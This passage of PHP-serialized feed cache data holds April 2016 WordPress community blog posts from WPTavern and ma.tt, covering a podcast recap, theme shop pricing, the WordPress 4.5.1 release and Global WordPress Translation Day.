Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: WPWeekly Episode 232 – Recap of WordCamp San Diego 2016\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=54156&preview_id=54156\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"http://wptavern.com/wpweekly-episode-232-recap-of-wordcamp-san-diego-2016\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2847:\"<p>In this episode of WordPress Weekly, <a href=\"http://marcuscouch.com/\">Marcus Couch</a> and I discuss the news of the week as our guest couldn’t make it.</p>\n<p>Marcus shares his experience at WordCamp San Diego this past weekend and offers feedback to the organizing team. We let you know what’s in the recently released WordPress update and discuss what happens to the data WordPress.org collects from users sites. As usual, Marcus ends the show with his plugin picks of the week.</p>\n<h2>Stories Discussed:</h2>\n<p><a href=\"http://wptavern.com/wordpress-4-5-1-fixes-12-bugs\">WordPress 4.5.1 Fixes 12 Bugs</a><br />\n<a href=\"http://wptavern.com/global-wordpress-translation-day-draws-448-participants-from-105-countries\">Global WordPress Translation Day Draws 448 Participants from 105 Countries</a><br />\n<a href=\"http://wptavern.com/wordpress-for-ios-adds-geotag-support-comment-moderation-gestures\">WordPress for iOS Adds Geotag Support, Comment Moderation Gestures</a><br />\n<a href=\"http://wptavern.com/wordpress-4-6-to-update-theme-filter-tags-in-the-admin\">WordPress 4.6 to Update Theme Filter Tags in the Admin</a><br />\n<a href=\"http://wptavern.com/what-wordpress-org-does-with-the-data-it-collects-from-users-sites\">What WordPress.org Does with the Data it Collects from Users Sites</a></p>\n<h2>Plugins Picked By Marcus:</h2>\n<p><a href=\"https://wordpress.org/plugins/video-gallery-awesome-responsive-youtube-vimeo-gallery/\">Video Gallery – YouTube and Vimeo Video Gallery </a>is a responsive plugin that allows you to show YouTube and Vimeo videos in various formats.</p>\n<p><a href=\"https://wordpress.org/plugins/on-sale-page-for-woocommerce/\">OnSale Page for WooCommerce </a>is an extension for WooCommerce that enables you to have a On Sale page with paging, sorting, and filtering options.</p>\n<p><a href=\"https://wordpress.org/plugins/embed-google-adwords-codes-on-woocommerce/\">Embed Google AdWords Codes on WooCommerce </a>enables users to implement Google AdWords conversion tracking to determine how effective ads are. It provides information such as the number of clicks that are generating sales.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, May 4th 9:30 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #232:</strong><br />\n</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 28 Apr 2016 06:24:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: Array Cuts Theme Club Pricing, Releases Free Theme Pack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54083\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"http://wptavern.com/array-cuts-theme-club-pricing-releases-free-theme-pack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4007:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/array-logo.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/array-logo.png?resize=956%2C440\" alt=\"array-logo\" class=\"aligncenter size-full wp-image-54154\" /></a></p>\n<p>Array <a href=\"https://arraythemes.com/welcome-to-array-3-0/\" target=\"_blank\">launched a redesign</a> of its theme shop this week along with drastic price cuts for single theme and club purchases. After conducting a <a href=\"https://arraythemes.com/complete-a-brief-survey-for-50-off/\" target=\"_blank\">customer survey</a> earlier this year, the company moved to act on feedback regarding its pricing structure.</p>\n<p>Previously, Array offered single theme purchases ranging in price from $49 to $89 and the entire collection for $199. The new pricing is more straightforward with all single themes at $49 and club membership for $89.</p>\n<p>The company, which began under the name Okay Themes and rebranded two years ago, announced last April that it would be <a href=\"http://wptavern.com/array-returns-to-themeforest-after-disappointing-experiences-selling-on-creative-market-and-wordpress-com\" target=\"_blank\">returning to Themeforest</a> after disappointing experiences selling on Creative Market and WordPress.com. Array currently has five items in its <a href=\"http://themeforest.net/user/arraythemes/portfolio\" target=\"_blank\">portfolio on Themeforest</a> ranging in price from $44-64. The company negotiated an agreement with the marketplace that gives them a better rate than other non-exclusive authors typically receive.</p>\n<p>“Although I can’t go into this in too much detail, we are actually not operating at the typical non-exclusive author rates, as most would rightfully assume,” founder Mike McAlister said in a <a href=\"http://wptavern.com/array-returns-to-themeforest-after-disappointing-experiences-selling-on-creative-market-and-wordpress-com#comment-66896\" target=\"_blank\">comment</a> on our post about the news. “We’ve worked out a mutually beneficial agreement with Envato that gives us a little more room for experimentation and bandwidth for providing quality support.”</p>\n<p>With equal or more affordable pricing at Themeforest, customers had little incentive to buy directly from the Array website with the previous pricing structure in place. The new $89 club membership is now more compelling for those who are interested in purchasing multiple themes directly from Array.</p>\n<p>In addition to the the redesign and new pricing, Array released a free theme pack to help potential customers get acquainted with their products before purchasing. The pack includes five of their most popular themes, some of which were not previously offered for free, including Author, Editor, Fixed, Typable and Transmit. Editor is also available on WordPress.org and WordPress.com.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/free-theme-pack.jpg\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/free-theme-pack.jpg?resize=1025%2C772\" alt=\"free-theme-pack\" class=\"aligncenter size-full wp-image-54143\" /></a></p>\n<p>Array’s journey over the past two years, which includes pulling out of Themeforest, rebranding, and then jumping back into the marketplace with a more beneficial arrangement, necessitated an update in its pricing structure in order to remain competitive. Customers gravitate towards straightforward pricing that they can understand, especially when products are sold across multiple marketplaces.</p>\n<p>The theme shop’s experimentation with selling on Themeforest, WordPress.com, Creative Market, Mojo Marketplace, and Array’s own website shows how much it has had to adapt to reach potential customers. Commercial WordPress themes are a multi-million dollar industry, but there’s no single avenue paved to success even when partnering with one of the dominant marketplaces.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 28 Apr 2016 05:32:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Matt: You Yourself\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=46523\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://ma.tt/2016/04/you-yourself/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:419:\"<blockquote><p>You yourself, as much as anybody in the entire universe, deserve your love and affection.</p></blockquote>\n<p>This quote is almost always attributed to Buddha. <a href=\"http://fakebuddhaquotes.com/you-yourself-as-much-as-anybody-in-the-entire-universe-deserve-your-love-and-affection/\">Luckily there’s a great WordPress site called Fake Buddha Quotes that tracks down its actual provenance</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Apr 2016 21:55:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Matt: Secret History of Tiger Woods\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=46519\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://ma.tt/2016/04/secret-history-of-tiger-woods/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:283:\"<p>ESPN has a fascinating longread on <a href=\"http://espn.go.com/espn/feature/story/_/id/15278522/how-tiger-woods-life-unraveled-years-father-earl-woods-death\">The Secret History of Tiger Woods, especially in the context of his relationship with and the death of his father</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Apr 2016 03:33:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"WPTavern: A 42-Year-Old Developer’s Advice on Working in Tech\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54077\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/a-42-year-old-developers-advice-on-working-in-tech\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5455:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/glasses-computer.jpg\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/glasses-computer.jpg?resize=960%2C557\" alt=\"photo credit: Aliis Sinisalu\" class=\"size-full wp-image-54120\" /></a>photo credit: <a href=\"https://stocksnap.io/photo/2SLJBDK4T0\">Aliis Sinisalu</a>\n<p><a href=\"https://twitter.com/akosma\" target=\"_blank\">Adrian Kosmaczewski</a>, a 42-year-old, self-taught developer, published an article today titled <a href=\"https://medium.com/@akosma/being-a-developer-after-40-3c5dd112210c#.5nju9pdg8\" target=\"_blank\">Being A Developer After 40</a>. The piece is full of sage advice that is resonating with developers of all ages. His post is a summary of a talk he gave at the <a href=\"https://www.appbuilders.ch/\" target=\"_blank\">App Builders Switzerland</a> conference in April with the accompanying slides <a href=\"https://speakerdeck.com/akosma/being-a-developer-after-40\" target=\"_blank\">available on Speaker Deck</a>.</p>\n<p>Kosmaczewski gives readers a glimpse into what the world of technology was like in 1997, the year he began his career as a developer before the days of unit tests and continuous integration, before SVN even existed.</p>\n<blockquote><p>My first job consisted of writing ASP pages in various editors, ranging from Microsoft FrontPage, to HotMeTaL Pro to EditPlus, managing cross-browser compatibility between Netscape Navigator and Internet Explorer 4, and writing stored procedures in SQL Server 6.5 powering a commercial website published in Japanese, Russian, English and Spanish — without any consistent UTF-8 support across the software stack.</p></blockquote>\n<p>If you worked as a developer in those days you may fondly remember working with some of these technologies. Since then, countless new ones have been introduced but the requirement to keep learning remains unchanged. Kosmaczewski offers advice on navigating the hype surrounding the newest programming languages.</p>\n<blockquote><p>Do not worry about hype. Keep doing your thing, keep learning what you were learning, and move on. Pay attention to it only if you have a genuine interest, or if you feel that it could bring you some benefit in the medium or long run.</p></blockquote>\n<p>It’s easy to get overwhelmed with all the new languages and frameworks that people say you need to learn in order to stay relevant, but Kosmaczewski encourages readers to follow their own interests and learn about software history. Otherwise, you’ll be forever chasing new architectures and ideas but never learning them in depth or gaining more than a shallow understanding of their implementation.</p>\n<p>In an industry where professionals are valued by their abilities in specific languages, many programmers allow their identity to be wrapped up in the tools they use. Kosmaczewski encourages readers to be ready to change course:</p>\n<blockquote><p>Do not criticize or make fun of the technology choices of your peers; for other people will have their own reasons to choose them, and they must be respected. Be prepared to change your mind at any time through learning. One day you might like Windows. One day you might like Android. I am actually liking some parts of Android lately. And that is OK.</p></blockquote>\n<p>His perspective comes from nearly 20 years of working as a developer. The lesson I saw in this section of his essay is that the technologies you work with are part of your journey, and you’ll cycle through many of them. However, be careful not to allow them to become your whole identity, because you are still learning.</p>\n<h3>The Value of Teaching</h3>\n<p>One of the most inspiring parts of his post is the section on teaching. We often hear the saying, “Those who can, do; those who can’t, teach,” thrown around smugly, but this devalues educators. Teaching is somewhat of a lost art in an industry where many professionals are self-taught. Yet, Kosmaczewski says there are some things you cannot learn without having taught someone else:</p>\n<blockquote><p>Teaching will make you more humble, because it will painfully show you how limited your knowledge is. Teaching is the best way to learn. Only by testing your knowledge against others are you going to learn properly. This will also make you more respectful regarding other developers and other technologies; every language, no matter how humble or arcane, has its place within the Tao of Programming, and only through teaching will you be able to feel it.</p></blockquote>\n<p>Kosmaczewski also shares some moving stories of how his teaching and mentoring have made a difference in the world, especially for those who are just beginning.</p>\n<p>If you have a few minutes, I highly recommend reading “<a href=\"https://medium.com/@akosma/being-a-developer-after-40-3c5dd112210c#.5nju9pdg8\" target=\"_blank\">Being A Developer After 40</a>.” This article is a window into one developer’s journey but his advice and habit recommendations are relevant to everyone from experienced programmers to those just starting out. Kosmaczewski explores some of the darker aspects of the industry but also the beauty of sticking with it. His closing statement sums it up nicely:</p>\n<blockquote><p>As long as your heart tells you to keep on coding and building new things, you will be young, forever.</p></blockquote>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 26 Apr 2016 21:41:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"WPTavern: WordPress 4.5.1 Fixes 12 Bugs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54104\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"http://wptavern.com/wordpress-4-5-1-fixes-12-bugs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1121:\"<p>WordPress 4.5.1 <a href=\"https://wordpress.org/wordpress-4.5.1.zip\">is available</a> and <a href=\"https://wordpress.org/news/2016/04/wordpress-4-5-1-maintenance-release/\">addresses a dozen items</a> reported against WordPress 4.5. According to Adam Silverstein, “a singular class issue that broke sites based on the Twenty Eleven theme, an incompatibility between certain Chrome versions and the visual editor, and an Imagick bug that could break media uploads,” are among the bugs fixed. A detailed list of changes can be <a href=\"https://core.trac.wordpress.org/log/branches/4.5?rev=37295&stop_rev=37182\">viewed here</a>.</p>\n<p>WordPress 4.5.1 is already being pushed out to sites configured for auto updates. If you’d rather not wait or have auto updates disabled, you can browse to Dashboard – Updates and click the Update Now button. If you encounter an issue or believe you’ve discovered a bug, please post it in the <a href=\"https://wordpress.org/support/forum/how-to-and-troubleshooting\">troubleshooting section</a> of the support forums.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 26 Apr 2016 19:54:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WPTavern: Global WordPress Translation Day Draws 448 Participants from 105 Countries\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54010\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://wptavern.com/global-wordpress-translation-day-draws-448-participants-from-105-countries\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7593:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/wordpress-global-translation-day.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/wordpress-global-translation-day.png?resize=1025%2C511\" alt=\"wordpress-global-translation-day\" class=\"aligncenter size-full wp-image-54040\" /></a></p>\n<p>The first <a href=\"https://wptranslationday.org/\" target=\"_blank\">Global WordPress Translation Day</a> was held over the weekend, organized by the Polyglots team. The event included 24 hours of live training sessions and translation sprints that spanned every timezone from East to West. The goal was to grow the translation teams and educate new translators with live training sessions.</p>\n<p>During the course of the event, 448 translators from 105 countries translated 40,350 new strings across 597 projects. This includes WordPress core and open source plugins and themes, such as Pods, Google Two-Factor Authentication, WooCommerce, bbPress, Yoast SEO, and hundreds of others.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/hashtag/WPTranslationDay?src=hash\">#WPTranslationDay</a> in Japan – Our collective achievement today: of top 100, 20 plugins/62 plugins are now translated in Japanese.</p>\n<p>— Naoko Takano (@naokomc) <a href=\"https://twitter.com/naokomc/status/724180025033940992\">April 24, 2016</a></p></blockquote>\n<p></p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/japan-thailand-wptranslation-day.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/japan-thailand-wptranslation-day.png?resize=1025%2C766\" alt=\"Japan and Thailand live streaming each other\'s events - photo credit: Menn Studio\" class=\"size-full wp-image-54075\" /></a>Japan and Thailand live streaming each other’s events – photo credit: <a href=\"https://twitter.com/MennStudio/status/724151092771065857\">Menn Studio</a>\n<p>“We had 39 local events and 11 remote events happening across the globe,” organizer Petya Raykovska said. “India was the big surprise with four of the big Indian languages getting new contributors, forming teams and connecting across India with one another to collaborate live.”</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Last year Hindi was far from 100%. Today 8 events in India translate to bo_IN, hi_IN, mr, gu, ml <a href=\"https://twitter.com/hashtag/WPTranslationday?src=hash\">#WPTranslationday</a> <a href=\"https://t.co/Lq5DoJrf0Q\">pic.twitter.com/Lq5DoJrf0Q</a></p>\n<p>— Petya Raykovska (@petyeah) <a href=\"https://twitter.com/petyeah/status/724103477002166272\">April 24, 2016</a></p></blockquote>\n<p></p>\n<p>All of the sessions were live streamed and the team had 316 people who watched the broadcast at some point during the day. The event featured 12 training sessions in different languages to teach participants how to translate WordPress core, including Japanese, Hindi, Bulgarian, German, Slovak, French, Spanish, Portuguese, Swedish, Dutch, Lithuanian and Italian.</p>\n<p>The other sessions focused on topics for plugin and theme developers, such as:</p>\n<ul>\n<li>Plugin documentation and support for the whole world</li>\n<li>How to find translators for your plugins and themes</li>\n<li>Localization – Beyond Translation </li>\n<li>The life of a string – or how WordPress gets its translations</li>\n<li>Plugin/Theme i18n: How to prepare your plugin or theme for translate.wordpress.org</li>\n<li>GlotDict – how a browser extension changes your translation workflow</li>\n</ul>\n<p>All of the videos from the event are <a href=\"https://www.crowdcast.io/e/wptranslationday\" target=\"_blank\">available on Crowdcast.io</a> if you want to learn more about the WordPress Polyglots team and how everyone works together. One of the best outcomes of the day, according to Raykovska, is that translation teams now have video documentation for new contributors. They plan to upload the videos to WordPress.tv and include them in the Polyglots handbook.</p>\n<h3>Global WordPress Translation Day Offers a New Avenue for Contributing to Translations</h3>\n<p>“We do contributor days around WordCamps and then the community summit once a year,” Raykovska said. “The contributor summit hasn’t been super productive for Polyglots so far. Unlike most other teams, most contributors are 100% volunteers and can’t afford (or get a Visa) for a trip to the US.</p>\n<p>“So we wanted to organize a contributor day without these restrictions for participants,” she said. “And that’s how the idea was born.”</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Staring at the top of the pile of strings we translated during the Dutch <a href=\"https://twitter.com/hashtag/wptranslationday?src=hash\">#wptranslationday</a> meetup! <a href=\"https://twitter.com/hashtag/community?src=hash\">#community</a> <a href=\"https://t.co/hnC3OJsHTS\">pic.twitter.com/hnC3OJsHTS</a></p>\n<p>— Taco Verdo (@TacoVerdo) <a href=\"https://twitter.com/TacoVerdo/status/724499512639782912\">April 25, 2016</a></p></blockquote>\n<p></p>\n<p>The Polyglots team has not set a date for the next Global WordPress Translation event, but Raykovska said it will be easier for them to organize now that they have the processes figured out. One of the most positive outcomes of this past weekend’s event is that it has sparked translation teams to organize more local events, especially now that they are armed with video documentation and training tools for plugin and theme developers.</p>\n<p>“Some countries are planning monthly contributor translation drives and standalone contributor days,” Raykovska said.</p>\n<blockquote class=\"instagram-media\"><div>\n<div>\n<div></div>\n</div>\n<p> <a href=\"https://www.instagram.com/p/BElHSiBB_KU/\" target=\"_blank\">#WPTranslationDay WordBench 東京。たくさん翻訳できました!</a></p>\n<p>A photo posted by Naoko Takano (@naokomc) on Apr 24, 2016 at 3:37am PDT</p>\n</div>\n</blockquote>\n<p></p>\n<p>Raykovska said next time she would like to get more people on screen from the events happening in different locations around the world. She also hopes to organize some round tables where Polyglots team members can share about their local processes and team structures.</p>\n<p>“I think we need to make a solid effort to bridge the gap between plugin authors and translators,” Raykovska said. “The demand for translations is growing, especially for the most used languages. An event like this would be a good reason for the two groups to gather and talk about what’s not quite working right now and think of ways to overcome it.”</p>\n<p>As many polyglots will be in attendance at WordCamp Europe, the team is considering organizing a gathering there. This multilingual WordPress event will be <a href=\"http://wptavern.com/wordcamp-europe-2016-expands-attendee-capacity-to-2200-largest-wordcamp-to-date\" target=\"_blank\">the largest WordCamp in history with 2200 